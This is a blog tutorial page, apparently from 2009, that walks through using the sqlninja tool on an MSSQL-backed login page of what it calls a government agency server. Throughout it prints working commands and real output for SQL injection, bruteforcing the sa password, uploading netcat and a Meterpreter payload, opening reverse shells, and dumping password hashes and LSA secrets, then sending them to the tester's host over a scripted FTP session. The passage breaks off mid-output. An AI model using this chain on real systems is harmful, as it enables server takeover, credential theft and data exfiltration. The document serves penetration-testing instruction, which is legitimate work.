{"id":140,"date":"2009-06-03T13:15:48","date_gmt":"2009-06-03T19:15:48","guid":{"rendered":"http:\/\/www.jedge.com\/wordpress\/?page_id=140"},"modified":"2010-08-18T13:13:06","modified_gmt":"2010-08-18T19:13:06","slug":"sqlninja-sql-injection","status":"publish","type":"page","link":"https:\/\/www.jedge.com\/wordpress\/sqlninja-sql-injection\/","title":{"rendered":"SQLNINJA: SQL Injection"},"content":{"rendered":"

SQLNINJA <\/p>\n

For a PDF version of this tutorial click here<\/a>.<\/p>\n

From the site:<\/p>\n

Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.<\/p>\n

SQLNinja (http:\/\/sqlninja.sourceforge.net\/index.html<\/a>)
\nDemo (http:\/\/sqlninja.sourceforge.net\/sqlninjademo.html<\/a>)
\nDocumentation (http:\/\/sqlninja.sourceforge.net\/sqlninja-howto.html<\/a>)<\/p>\n

That more than sums up what the tool is used for. This document will go into the experiences I have had using the tool successfully during a penetration test. The results shown are real world examples with the sensitive information scrubbed to protect the innocent. This document will also deal with installation of SQLninja on an Ubuntu 8.04 LTS Hardy Heron System.<\/p>\n

SQLNinja is a perl script that requires a number of perl libraries to function properly. I installed these libraries using CPAN (www.cpan.org). The use of CPAN is outside the scope of this document.
\n
\n#perl \u2013MCPAN \u2013e \u2018install NetPacket\u2019
\n#apt-get install libpcap0.8 libpcap0.8-dev
\n#perl \u2013MCPAN \u2013e \u2018install Net::Pcap\u2019
\n#perl \u2013MCPAN \u2013e \u2018install Net::DNS\u2019
\n#perl \u2013MCPAN \u2013e \u2018install Net::RawIP\u2019
\n#perl \u2013MCPAN \u2013e \u2018install IO::Socket::SSL\u2019
\n<\/kbd>
\n#wget http:\/\/downloads.sourceforge.net\/sqlninja\/sqlninja-0.2.3-r1.tgz
\n#tar zxvf sqlninja-0.2.3-r1.tgz
\n#cd sqlninja-0.2.3-r1
\n<\/kbd>
\nFirst thing you will want to do is run a test against your target. If you do not have a sqlninja.conf file from a previous test in the folder you will be asked for informtion regarding the target to create the configuration file so an attack can be conducted.<\/p>\n

\nroot@edge-linuxpen:~\/sqlninja-0.2.3-r1# .\/sqlninja -m test\nSqlninja rel. 0.2.3-r1\nCopyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>\n[-] sqlninja.conf does not exist. You want to create it now ? [y\/n]\n> y\n[+] Creating a new configuration file. Keep in mind that only basic options\n    will be generated, and that the file should be manually edited for advanced\n    options and fine tuning.\n\n[1\/10] Victim host (e.g.: www.victim.com):\n> state.govt.agency.us\n\n[2\/10] Remote port [80]\n> 443\n\n[3\/10] Use SSL (y\/n\/auto) [auto]\n> y\n\n[4\/10] Method to use (GET\/POST) [GET]\n> POST\n\n[5\/10] Vulnerable page, including path and leading slash \n(e.g.: \/dir\/target.asp)\n> \/APPLICATION\/Folder\/AuthenticationPage.asp\n\n[6\/10] Start of the exploit string. It must include the vulnerable parameter \nand the character sequence that allows us to start injecting commands. In\ngeneral this means, at least:\n - an apostrophe (if the parameter is a string)\n - a semicolon (to end the original query)\nIt must also include everything necessary to properly close the original query,\nas an appropriate number of closing brackets. Don't forget to URL-encode,\nwhere needed (e.g.: spaces).\nFor instance, if we consider the following TSQL command:\n    exec master..xp_cmdshell 'dir c:\\'\nand the string to inject is the following:\n    aaa=1&bbb=x';exec+master..xp_cmdshell+'dir+c:'\nthis parameter should look like this:\n    aaa=1&bbb=x';\n> Submit=Submit&Password=pwned&UserName=auditor'\n\n[7\/10] If you need to add some more parameters after the vulnerable one, put\nthem here (don't forget the leading "&" sign and to URL-encode where needed).\ne.g.: &param3=aaa\n> \n\n[8\/10]  Local host: your IP address (for backscan and revshell modes)\n> 192.168.0.1\n\n[9\/10] Interface to sniff when in backscan mode\n> eth0\n\n[10\/10] Evasion techniques. Possible choices are:\n  1 - Query hex-encoding\n  2 - Comments as separators\n  3 - Random case\n  4 - Random URI encoding\nAll techniques can be combined, so for instance you can enter "1234" (without\nquotes). However, keep in mind that using too many techniques at once leads to\nvery long queries, that might create problems when using GET.\nDefault: 0 (no evasion)\n> \n\n[+] sqlninja.conf written successfully\n[+] Parsing configuration file................\n[+] Target is: state.govt.agency.us\n[+] Trying to inject a 'waitfor delay'....\n[+] Injection was successful! Let's rock !! :)\n<\/code><\/pre><\/p>\n
In this particular instance the SQL Injection vulnerability is in the login page of the application.  After you have confirmed that SQL Injection is possible and SQLNinja is configured correctly you can begin fingerprinting the backend database.<\/p>\n
\nroot@edge-linuxpen:~\/sqlninja-0.2.3-r1# .\/sqlninja -m fingerprint\nSqlninja rel. 0.2.3-r1\nCopyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>\n[+] Parsing configuration file................\n[+] Target is: state.govt.agency.us\nWhat do you want to discover ?\n  0 - Database version (2000\/2005)\n  1 - Database user\n  2 - Database user rights\n  3 - Whether xp_cmdshell is working\n  4 - Whether mixed or Windows-only authentication is used\n  a - All of the above\n  h - Print this menu\n  q - exit\n> 0\n[+] Checking SQL Server version...\n  Target: Microsoft SQL Server 2000\n> 1\n[+] Checking whether we are sysadmin...\n  No, we are not 'sa'.... :\/ \n[+] Finding dbuser length... \n  Got it ! Length = 11\n[+] Now going for the characters........\n  DB User is....: APPLICATION\n> 2\n[+] Checking whether user is member of sysadmin server role....\n  You are not an administrator. If you tried escalating already, it might be\n  that you are using old ODBC connections. Check the documentation\n  for how to deal with this\n> 3\n[+] Checking whether xp_cmdshell is available\n  xp_cmdshell doesn't seem to be available\n> 4\n  Mixed authentication seems to be used\n> q\n<\/code><\/pre><\/p>\n
We are not the sa (MSSQL Administrator) user but instead are the user APPLICATION and do not have administrative rights on the database.  Please see another tutorial I have created for the SQL Injection tool automagic on how to extract the data from the database with the user APPLICATION.  The fact that the database uses Mixed authentication mode allows us to conduct a dictionary attack to identify the sa password.<\/p>\n
\nroot@edge-linuxpen:~\/sqlninja-0.2.3-r1# .\/sqlninja -v -m bruteforce -w pass.txt\nSqlninja rel. 0.2.3-r1\nCopyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>\n[+] Parsing configuration file................\n  - Host: state.govt.agency.us\n  - Port: 443\n  - SSL: yes\n  - method: POST\n  - page: \/APPLICATION\/Folder\/AuthenticationPage.asp\n  - stringstart: Submit=Submit&Password=pwned&UserName=auditor'\n  - stringend: \n  - local host: 192.168.0.1\n  - sniff device: eth0\n  - domain: sqlninja.net\n[v] SSL connection forced\n[+] Target is: state.govt.agency.us\n[+] Wordlist has been specified: using dictionary-based bruteforce\n  Number of concurrent processes  [min:1 max:10 default:3]\n> 1\n  [v] Creating UNIX socket for children messages\n  [v] Launching children processes\n[+] Bruteforcing the sa password. This might take a while\n  dba password is...: servername\nbruteforce took 60 seconds\n[+] Trying to add current user to sysadmin group\n[+] Done! New connections will be run with administrative privileges! In case\n    the server uses ODBC, you might have to wait a little bit\n    (check sqlninja-howto.html)\n<\/code><\/pre><\/p>\n
As you can see from the results the sa password was the name of the server.  Tisk, tisk\u2026  SQLninja does not have a check for the name of the server you are attacking.  I obtained this by running a manual query against the application.<\/p>\n
\u2018 and 1 in (select @@servername)--<\/kbd>
\n
\nMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'
\n[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'SERVERNAME' to a column of data type int.
\n\/APPLICATION\/Folder\/AuthenticationPage.asp, line 36
\n<\/kbd><\/p>\n
We will run the fingerprint option again to confirm that we are a database administrative user and to see if xp_cmdshell is enabled.<\/p>\n
\nroot@edge-linuxpen:~\/sqlninja-0.2.3-r1# .\/sqlninja -m fingerprint\nSqlninja rel. 0.2.3-r1\nCopyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>\n[+] Parsing configuration file................\n[+] Target is: state.govt.agency.us\nWhat do you want to discover ?\n  0 - Database version (2000\/2005)\n  1 - Database user\n  2 - Database user rights\n  3 - Whether xp_cmdshell is working\n  4 - Whether mixed or Windows-only authentication is used\n  a - All of the above\n  h - Print this menu\n  q - exit\n> 2\n[+] Checking whether user is member of sysadmin server role....\n  You are an administrator !\n> 3\n[+] Checking whether xp_cmdshell is available\n  xp_cmdshell seems to be available :)\n> q\n<\/code><\/pre><\/p>\n
We are a database administrator and xp_cmdshell is available as is the default for Microsoft SQL Server 2000.  Using the SQL Injection vulnerability and xp_cmdshell we can upload a file provided by SQLNinja.  The file provided is NetCat (nc.exe as nc.scr) that has been pre-parsed by a provided perl script so that it can be uploaded line by line by the sql injection vulnerability.  Once uploaded the NetCat program is put back together by the debug.exe command found on the host.<\/p>\n
\nroot@edge-linuxpen:~\/sqlninja-0.2.3-r1# .\/sqlninja -m upload\nSqlninja rel. 0.2.3-r1\nCopyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>\n[+] Parsing configuration file................\n[+] Target is: state.govt.agency.us\n  File to upload:\n  shortcuts: 1=scripts\/nc.scr 2=scripts\/dnstun.scr\n> 1\n[+] Uploading scripts\/nc.scr debug script............\n1540\/1540 lines written         \ndone !\n[+] Converting script to executable... might take a while\n[+] Checking whether nc.exe is there...\n[+] nc.exe seems to be there...  enjoy! :)\n<\/code><\/pre><\/p>\n
The database server did not have anti-virus software installed so the upload of NetCat was successful.  However, if the server did have anti-virus installed there is a document that can be found online on how to take back NetCat (www.packetstormsecurity.org\/papers\/virus\/Taking_Back_Netcat.pdf<\/a>).  You can take your modified NetCat executable and create the necessary script to be uploaded by SQLNinja using a perl script provided with the utility.  That script, makescr.pl, found in the root of the SQLNinja folder takes the exe and produces the proper scr file that can be uploaded by the SQL Injection vulnerability and put back to the original exe on the host using the debug.exe command.<\/p>\n
\nroot@edge-linuxpen:~\/sqlninja-0.2.3-r1# .\/makescr.pl\nsqlninja debug script generator\nCopyright (C) 2008 icesurfer <r00t@northernfortress.net>\n\nUsage: .\/makescr.pl -i <\\input file> [-o <\\output file>]\n\nroot@edge-linuxpen:~\/sqlninja-0.2.3-r1# .\/makescr.pl -i nc.edge.exe -o nc.scr\nsqlninja debug script generator\nCopyright (C) 2008 icesurfer <r00t@northernfortress.net>\n\nDebug script created successfully\nroot@edge-linuxpen:~\/sqlninja-0.2.3-r1# mv scripts\/nc.scr scripts\/nc.scr.sv\nroot@edge-linuxpen:~\/sqlninja-0.2.3-r1# mv nc.scr scripts\n<\/code><\/pre><\/p>\n
Just upload the new NetCat script.  Once the script is uploaded you can then use the SQLNinja backscan option to find an open port that the SQL server communicates out to the internet with.  However, for me this did not work so please rely on the demo found on the SQLNinja website for how the command works.  I manually tried three of the most common ports that a server would communicate out to the internet with (udp 53, tcp 80, & tcp 443).  We will now create a reverse shell back to our host.<\/p>\n
\nroot@edge-linuxpen:~\/Desktop\/sqlninja-0.2.3-r1# .\/sqlninja -v -m revshell\nSqlninja rel. 0.2.3-r1\nCopyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>\n[+] Parsing configuration file................\n  - Host: state.govt.agency.us\n  - Port: 443\n  - SSL: yes\n  - method: POST\n  - page: \/APPLICATION\/Folder\/AuthenticationPage.asp\n  - stringstart: Submit=Submit&Password=pwned&UserName=auditor'\n  - stringend: \n  - local host: 192.168.0.1\n  - sniff device: eth0\n  - domain: sqlninja.net\n[v] SSL connection forced\n[+] Target is: state.govt.agency.us\n  [v] Starting revshell module\nLocal port: 443\ntcp\/udp [default: tcp]: tcp\n  [v] Starting listener process\n  [v] Creating local listening tcp socket\n[+] waiting for shell on port 443\/tcp...\nMicrosoft Windows 2000 [Version 5.00.2195]\n(C) Copyright 1985-2000 Microsoft Corp.\n\nC:\\WINNT\\system32>whoami\nwhoami\nSERVERNAME\\Administrator\n<\/code><\/pre><\/p>\n
You have successfully taken over the backend database server using a SQL Injection vulnerability found in a web application!  Below is what I did to aquire the password hashes on the server so I can crack some passwords and hopefully dig further into the agency.  The first thing we need to do is get the PWDumpX application uploaded to the server.  I create the necessary scripts to be uploaded using the perl script provided.<\/p>\n

\nroot@edge-linuxpen:~\/sqlninja-0.2.3-r1# .\/makescr.pl -i PWDumpX.exe -o PWDumpX.scr
\nsqlninja debug script generator
\nCopyright (C) 2008 icesurfer 
\n<\/kbd>
\nDebug script created successfully
\nroot@edge-linuxpen:~\/sqlninja-0.2.3-r1# mv PWDumpX.scr scripts
\nroot@edge-linuxpen:~\/sqlninja-0.2.3-r1# .\/makescr.pl -i DumpSvc.exe -o DumpSvc.scr
\nsqlninja debug script generator
\nCopyright (C) 2008 icesurfer 
\n<\/kbd>
\nDebug script created successfully
\nroot@edge-linuxpen:~\/sqlninja-0.2.3-r1# mv DumpSvc.scr scripts
\nroot@edge-linuxpen:~\/sqlninja-0.2.3-r1# .\/makescr.pl -i DumpExt.dll -o DumpExt.scr
\nsqlninja debug script generator
\nCopyright (C) 2008 icesurfer 
\n<\/kbd>
\nDebug script created successfully
\nroot@edge-linuxpen:~\/sqlninja-0.2.3-r1# mv DumpExt.scr scripts
\n<\/kbd><\/p>\n
I then upload them using SQLNinja<\/p>\n
\nroot@edge-linuxpen:~\/sqlninja-0.2.3-r1# .\/sqlninja -v -m upload\nSqlninja rel. 0.2.3-r1\nCopyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>\n[+] Parsing configuration file................\n  - Host: state.govt.agency.us\n  - Port: 443\n  - SSL: yes\n  - method: POST\n  - page: \/APPLICATION\/Folder\/AuthenticationPage.asp\n  - stringstart: Submit=Submit&Password=pwned&UserName=auditor\u2019\n  - stringend: \n  - local host: 192.168.0.1\n  - sniff device: eth0\n  - domain: sqlninja.net\n[v] SSL connection forced\n[+] Target is: state.govt.agency.us\n  File to upload:\n  shortcuts: 1=scripts\/nc.scr 2=scripts\/dnstun.scr\n> scripts\/DumpSvc.scr\n  [v] Starting upload module\n  [v] Deleting any previous instance of the file...\n[+] Uploading scripts\/DumpSvc.scr debug script............\n688\/31[-] Warning... the server responded with HTTP\/1.1 500 Internal Server Error\n    Check configuration, as things might not be working as expected !\n3184\/3184 lines written         \ndone !\n[v] Checking number of uploaded lines\n[v] DumpSvc.scr seems to have been properly uploaded\n[+] Converting script to executable... might take a while\n[v] Removing the original scr file\n[+] Checking whether DumpSvc.exe is there...\n[+] DumpSvc.exe seems to be there...  enjoy! :)\nroot@edge-linuxpen:~\/sqlninja-0.2.3-r1# .\/sqlninja -v -m upload\nSqlninja rel. 0.2.3-r1\nCopyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>\n[+] Parsing configuration file................\n  - Host: state.govt.agency.us\n  - Port: 443\n  - SSL: yes\n  - method: POST\n  - page: \/APPLICATION\/Folder\/AuthenticationPage.asp\n  - stringstart: Submit=Submit&Password=pwned&UserName=auditor\u2019\n  - stringend: \n  - local host: 192.168.0.1\n  - sniff device: eth0\n  - domain: sqlninja.net\n[v] SSL connection forced\n[+] Target is: state.govt.agency.us\n  File to upload:\n  shortcuts: 1=scripts\/nc.scr 2=scripts\/dnstun.scr\n> scripts\/PWDumpX.scr\n  [v] Starting upload module\n  [v] Deleting any previous instance of the file...\n[+] Uploading scripts\/PWDumpX.scr debug script............\n3990\/3990 lines written         \ndone !\n[v] Checking number of uploaded lines\n[v] PWDumpX.scr seems to have been properly uploaded\n[+] Converting script to executable... might take a while\n[v] Removing the original scr file\n[+] Checking whether PWDumpX.exe is there...\n[+] PWDumpX.exe seems to be there...  enjoy! :)\nroot@edge-linuxpen:~\/sqlninja-0.2.3-r1# .\/sqlninja -v -m upload\nSqlninja rel. 0.2.3-r1\nCopyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>\n[+] Parsing configuration file................\n  - Host: state.govt.agency.us\n  - Port: 443\n  - SSL: yes\n  - method: POST\n  - page: \/APPLICATION\/Folder\/AuthenticationPage.asp\n  - stringstart: Submit=Submit&Password=pwned&UserName=auditor\u2019\n  - stringend: \n  - local host: 192.168.0.1\n  - sniff device: eth0\n  - domain: sqlninja.net\n[v] SSL connection forced\n[+] Target is: state.govt.agency.us\n  File to upload:\n  shortcuts: 1=scripts\/nc.scr 2=scripts\/dnstun.scr\n> scripts\/DumpExt.scr\n  [v] Starting upload module\n  [v] Deleting any previous instance of the file...\n[+] Uploading scripts\/DumpExt.scr debug script............\n3729\/3729 lines written         \ndone !\n[v] Checking number of uploaded lines\n[v] DumpExt.scr seems to have been properly uploaded\n[+] Converting script to executable... might take a while\n[v] Removing the original scr file\n[+] Checking whether DumpExt.exe is there...\n[+] DumpExt.exe seems to be there...  enjoy! :)\n<\/code><\/pre><\/p>\n
Once the files are uploaded I create a reverse shell connection, rename DumpExt.exe to DumpExt.dll and run PWDumpX.  Note, all files uploaded by SQLNinja are placed in the %TEMP% directory.<\/p>\n
\nC:\\WINNT\\system32>cd %TEMP%\ncd %TEMP%\n\nC:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp>dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is 0000-0001\n\n Directory of C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\n\n05\/28\/2009  07:03a      <DIR>          .\n05\/28\/2009  07:03a      <DIR>          ..\n05\/28\/2009  07:03a              37,384 DumpExt.exe\n05\/28\/2009  07:01a              24,400 DumpSvc.exe\n05\/27\/2009  03:03p              30,720 nc.exe\n05\/28\/2009  07:03a              32,813 PWDumpX.exe\n               x File(s)        xxx,xxx bytes\n               x Dir(s)   x,xxx,xxx,xxx bytes free\n\nC:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp>move DumpExt.exe DumpExt.dll\nmove DumpExt.exe DumpExt.dll\n\nC:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp>pwdumpx\npwdumpx\nPWDumpX v1.4 | http:\/\/reedarvin.thearvins.com\/\n\nUsage: PWDumpX [-clph] <hostname | ip input file> <username> <password>\n\n[-clph]                     -- optional argument\n<hostname | ip input file>  -- required argument\n<username>                  -- required argument\n<password>                  -- required argument\n\n-c  -- Dump Password Cache\n-l  -- Dump LSA Secrets\n-p  -- Dump Password Hashes\n-h  -- Dump Password History Hashes\n\nIf the <username> and <password> arguments are both plus signs (+), the\nexisting credentials of the user running this utility will be used.\n\nExamples:\nPWDumpX 10.10.10.10 + +\nPWDumpX 10.10.10.10 administrator password\n\nPWDumpX -lp MyWindowsMachine + +\nPWDumpX -lp MyWindowsMachine administrator password\n\nPWDumpX -clph IPInputFile.txt + +\nPWDumpX -clph IPInputFile.txt administrator password\n\n(Written by Reed Arvin | reedarvin@gmail.com)\n\nC:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp>pwdumpx -clph 127.0.0.1 + +\npwdumpx -clph 127.0.0.1 + +\nRunning PWDumpX v1.4 with the following arguments:\n[+] Host Input:   "127.0.0.1"\n[+] Username:     "+"\n[+] Password:     "+"\n[+] Arguments:    "-clph"\n[+] # of Threads: "64"\n\nWaiting for PWDumpX service to terminate on host 127.0.0.1.\n\nRetrieved file 127.0.0.1-PWCache.txt\nRetrieved file 127.0.0.1-LSASecrets.txt\nRetrieved file 127.0.0.1-PWHashes.txt\nRetrieved file 127.0.0.1-PWHistoryHashes.txt\n<\/code><\/pre><\/p>\n
At this point the text files are created and I just print them to the screen using to more command to copy and past the text to my laptop.<\/p>\n
Advanced Techniques<\/p>\n
While I had access I documented additional ways that SQLNinja can be used to control a backend database server through SQL Injection.  I also documented easier ways to upload PWDumpX without having to resort to using SQLNinja.<\/p>\n
Below we create an FTP script and use it to connect to an FTP server we control.  We GET the PWDumpX program, run it, and PUT the output to our machine.  Configuring an FTP server is outside the scope of this document.<\/p>\n
\nroot@edge-linuxpen:~\/sqlninja-0.2.3-r1# .\/sqlninja -m revshell\nSqlninja rel. 0.2.3-r1\nCopyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>\n[+] Parsing configuration file................\n[+] Target is: state.govt.agency.us\nLocal port: 80\ntcp\/udp [default: tcp]: tcp\n[+] waiting for shell on port 80\/tcp...\nMicrosoft Windows 2000 [Version 5.00.2195]\n(C) Copyright 1985-2000 Microsoft Corp.\n\nC:\\WINNT\\system32>cd\\\ncd\\\n\nC:\\>echo OPEN 192.168.0.1 >> ftp.txt\necho OPEN 192.168.0.1 >> ftp.txt\n\nC:\\>echo bin >> ftp.txt\necho bin >> ftp.txt\n\nC:\\>echo GET PWDumpX.exe >> ftp.txt\necho GET PWDumpX.exe >> ftp.txt\n\nC:\\>echo GET DumpSvc.exe >> ftp.txt\necho GET DumpSvc.exe >> ftp.txt\n\nC:\\>echo GET DumpExt.dll >> ftp.txt\necho GET DumpExt.dll >> ftp.txt\n\nC:\\>echo bye >> ftp.txt\necho bye >> ftp.txt\n\nC:\\>ftp -A -s:ftp.txt\nftp -A -s:ftp.txt\nAnonymous login succeeded for Administrator@servername.state.govt.agency.us\nOPEN 192.168.0.1 \n\nbin \nGET PWDumpX.exe \nGET DumpSvc.exe \nGET DumpExt.dll \nbye \n\nC:\\>dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is 0000-0001\n\n Directory of C:\\\n\n02\/09\/2009  05:16p      <DIR>          Documents and Settings\n05\/29\/2009  10:41a              37,384 DumpExt.dll\n05\/29\/2009  10:41a              24,400 DumpSvc.exe\n05\/29\/2009  10:35a                 115 ftp.txt\n05\/27\/2009  08:37a      <DIR>          Program Files\n05\/29\/2009  10:41a              32,813 PWDumpX.exe\n11\/16\/2005  08:25a      <DIR>          Temp\n05\/27\/2009  08:37a      <DIR>          WINNT\n               x File(s)        xxx,xxx bytes\n               x Dir(s)   x,xxx,xxx,xxx bytes free\n\nC:\\>PWDumpX.exe -clph 127.0.0.1 + +\nPWDumpX.exe -clph 127.0.0.1 + +\nRunning PWDumpX v1.4 with the following arguments:\n[+] Host Input:   "127.0.0.1"\n[+] Username:     "+"\n[+] Password:     "+"\n[+] Arguments:    "-clph"\n[+] # of Threads: "64"\n\nWaiting for PWDumpX service to terminate on host 127.0.0.1.\n\nRetrieved file 127.0.0.1-PWCache.txt\nRetrieved file 127.0.0.1-LSASecrets.txt\nRetrieved file 127.0.0.1-PWHashes.txt\nRetrieved file 127.0.0.1-PWHistoryHashes.txt\n\nC:\\>del ftp.txt\ndel ftp.txt\n\nC:\\>echo OPEN 192.168.0.1 >> ftp.txt\necho OPEN 192.168.0.1 >> ftp.txt\n\nC:\\>echo CD files >> ftp.txt\necho CD files >> ftp.txt\n\nC:\\>echo PUT 127.0.0.1-PWCache.txt >> ftp.txt\necho PUT 127.0.0.1-PWCache.txt >> ftp.txt\n\nC:\\>echo PUT 127.0.0.1-LSASecrets.txt >> ftp.txt\necho PUT 127.0.0.1-LSASecrets.txt >> ftp.txt\n\nC:\\>echo PUT 127.0.0.1-PWHashes.txt >> ftp.txt\necho PUT 127.0.0.1-PWHashes.txt >> ftp.txt\n\nC:\\>echo PUT 127.0.0.1-PWHistoryHashes.txt >> ftp.txt\necho PUT 127.0.0.1-PWHistoryHashes.txt >> ftp.txt\n\nC:\\>echo bye >> ftp.txt\necho bye >> ftp.txt\n\nC:\\>ftp -A -s:ftp.txt\nftp -A -s:ftp.txt\nAnonymous login succeeded for Administrator@servername.state.govt.agency.us\nOPEN 192.168.0.1 \nCD files \nPUT 127.0.0.1-PWCache.txt \nPUT 127.0.0.1-LSASecrets.txt \nPUT 127.0.0.1-PWHashes.txt \nPUT 127.0.0.1-PWHistoryHashes.txt \nbye \n\nC:\\>\n<\/code><\/pre><\/p>\n
Metasploit<\/p>\n
The documentation for the metasploit option of SQLNinja explains what the utility does to include metatsploit functionality.  Please read it here (http:\/\/sqlninja.sourceforge.net\/sqlninja-howto.html#ss2.11).  <\/p>\n
NOTE:  When using SQLNinja to upload and launch the Metasploit payload I noticed that the SQL Injection command to run the uploaded payload would take place before Metaploit had enough time to load.  I have no idea if Metasploit takes a while to load on other users systems but in case it does I modified the SQLNinja code to allow more time to go by before the SQL Injection command to execute the payload is sent.  Lines 3301-3305 of sqlninja contain an if statement with some delay variables.  I just changed them from 5 to 25 allowing enough time for Metasploit to load when it is called by the script.<\/p>\n
\nroot@edge-linuxpen:~\/sqlninja-0.2.3-r1# .\/sqlninja -v -m metasploit\nSqlninja rel. 0.2.3-r1\nCopyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>\n[+] Parsing configuration file................\n  - Host: state.govt.agency.us\n  - Port: 443\n  - SSL: yes\n  - method: POST\n  - page: \/TAADRA\/Non_Compliance_Entry\/TAADRALoginResp.asp\n  - stringstart: Submit=Submit&Password=pwned&UserName=auditor\u2019\n  - stringend: \n  - local host: 192.168.0.1\n  - sniff device: eth0\n  - domain: sqlninja.net\n[v] SSL connection forced\n[+] Target is: state.govt.agency.us\n[+] Entering Metasploit module. In order to use this module you need to\n    have found an available TCP port, either inbound or outbound\n[+] Checking Metasploit3 availability....\n[+] Which payload you want to use?\n    1: Meterpreter\n    2: VNC\n> 1\n[+] Which type of connection you want to use?\n    1: bind_tcp\n    2: reverse_tcp\n> 2\n[+] Enter local port number\n> 443\n[+] Choose a payload encoding method\n    0 - none\n    1 - Alpha2 Alphanumeric Mixedcase\n    2 - Alpha2 Alphanumeric Uppercase\n    3 - Avoid UTF8\/tolower\n    4 - Call+4 Dword XOR\n    5 - Single-byte XOR Countdown\n    6 - Variable-length Fnstenv\/mov Dword XOR\n    7 - Polymorphic Jump\/Call XOR Additive Feedback\n    8 - Non-Alpha\n    9 - Non-Upper\n   10 - Polymorphic XOR Additive Feedback\n   11 - Alpha2 Alphanumeric Unicode Mixedcase\n   12 - Alpha2 Alphanumeric Unicode Uppercase\n> 0\n[v] Command: \/home\/edge\/trunk\/msfpayload windows\/meterpreter\/reverse_tcp exitfunc=process lport=443 lhost=192.168.0.1 X > \/tmp\/met5190.exe\n[+] Calling msfpayload3 to create the payload...\nCreated by msfpayload (http:\/\/www.metasploit.com).\nPayload: windows\/meterpreter\/reverse_tcp\n Length: 278\nOptions: exitfunc=process,lport=443,lhost=192.168.0.1\n[+] Payload (met5190.exe) created. Now converting it to debug script\n  [v] Starting upload module\n  [v] Deleting any previous instance of the file...\n[+] Uploading \/tmp\/met5190.scr debug script............\n113\/113 lines written         \ndone !\n[v] Checking number of uploaded lines\n[v] met5190.scr seems to have been properly uploaded\n[+] Converting script to executable... might take a while\n[v] Removing the original scr file\n[+] Checking whether met5190.exe is there...\n[+] met5190.exe seems to be there...  enjoy! :)\n[+] Checking if DEP (Data Execution Prevention) is enabled on target\n[+] No DEP detected.... good\n[v] Executing: \/home\/edge\/trunk\/msfcli multi\/handler payload=windows\/meterpreter\/reverse_tcp lport=443 lhost=192.168.0.1 E\n[+] Transferring control to msfcli. Have fun!\n\n[*] Please wait while we load the module tree...\n[*] Handler binding to LHOST 0.0.0.0\n[*] Started reverse handler\n[*] Starting the payload handler...\n[*] Transmitting intermediate stager for over-sized stage...(191 bytes)\n[*] Sending stage (2650 bytes)\n[*] Sleeping before handling stage...\n[*] Uploading DLL (75787 bytes)...\n[*] Upload completed.\n[*] Meterpreter session 1 opened (192.168.0.1:443 -> xxx.xxx.xxx.xxx:24785)\n\nmeterpreter > \nmeterpreter > upload \/home\/edge\/downloads\/pwdumpx\/DumpExt.dll c:\\\n[*] uploading  : \/home\/edge\/downloads\/pwdumpx\/DumpExt.dll -> c:\\\n[*] uploaded   : \/home\/edge\/downloads\/pwdumpx\/DumpExt.dll -> c:\\\\DumpExt.dll\nmeterpreter > \/home\/edge\/downloads\/pwdumpx\/DumpSvc.exe c:\\\n[-] Unknown command: \/home\/edge\/downloads\/pwdumpx\/DumpSvc.exe.\nmeterpreter > upload \/home\/edge\/downloads\/pwdumpx\/DumpSvc.exe c:\\\n[*] uploading  : \/home\/edge\/downloads\/pwdumpx\/DumpSvc.exe -> c:\\\n[*] uploaded   : \/home\/edge\/downloads\/pwdumpx\/DumpSvc.exe -> c:\\\\DumpSvc.exe\nmeterpreter > upload \/home\/edge\/downloads\/pwdumpx\/PWDumpX.exe c:\\\n[*] uploading  : \/home\/edge\/downloads\/pwdumpx\/PWDumpX.exe -> c:\\\n[*] uploaded   : \/home\/edge\/downloads\/pwdumpx\/PWDumpX.exe -> c:\\\\PWDumpX.exe\nmeterpreter > execute -f cmd -c\nProcess 9428 created.\nChannel 8 created.\nmeterpreter > interact 8\nInteracting with channel 8...\n\nMicrosoft Windows 2000 [Version 5.00.2195]\n(C) Copyright 1985-2000 Microsoft Corp.\n\nC:\\WINNT\\system32>cd\\\ncd\\\n\nC:\\>dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is 0000-0001\n\n Directory of C:\\\n\n02\/09\/2009  05:16p      <DIR>          Documents and Settings\n05\/29\/2009  06:49a              37,384 DumpExt.dll\n05\/29\/2009  06:49a              24,400 DumpSvc.exe\n05\/27\/2009  08:37a      <DIR>          Program Files\n05\/29\/2009  06:49a              32,813 PWDumpX.exe\n11\/16\/2005  08:25a      <DIR>          Temp\n05\/27\/2009  08:37a      <DIR>          WINNT\n              xx File(s)      x,xxx,xxx bytes\n               x Dir(s)   x,xxx,xxx,xxxx bytes free\n\nC:\\>pwdumpx -clph 127.0.0.1 + +\npwdumpx -clph 127.0.0.1 + +\nRunning PWDumpX v1.4 with the following arguments:\n[+] Host Input:   "127.0.0.1"\n[+] Username:     "+"\n[+] Password:     "+"\n[+] Arguments:    "-clph"\n[+] # of Threads: "64"\n\nWaiting for PWDumpX service to terminate on host 127.0.0.1..\n\nRetrieved file 127.0.0.1-PWCache.txt\nRetrieved file 127.0.0.1-LSASecrets.txt\nRetrieved file 127.0.0.1-PWHashes.txt\nRetrieved file 127.0.0.1-PWHistoryHashes.txt\n\nC:\\>dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is 0000-0001\n\n Directory 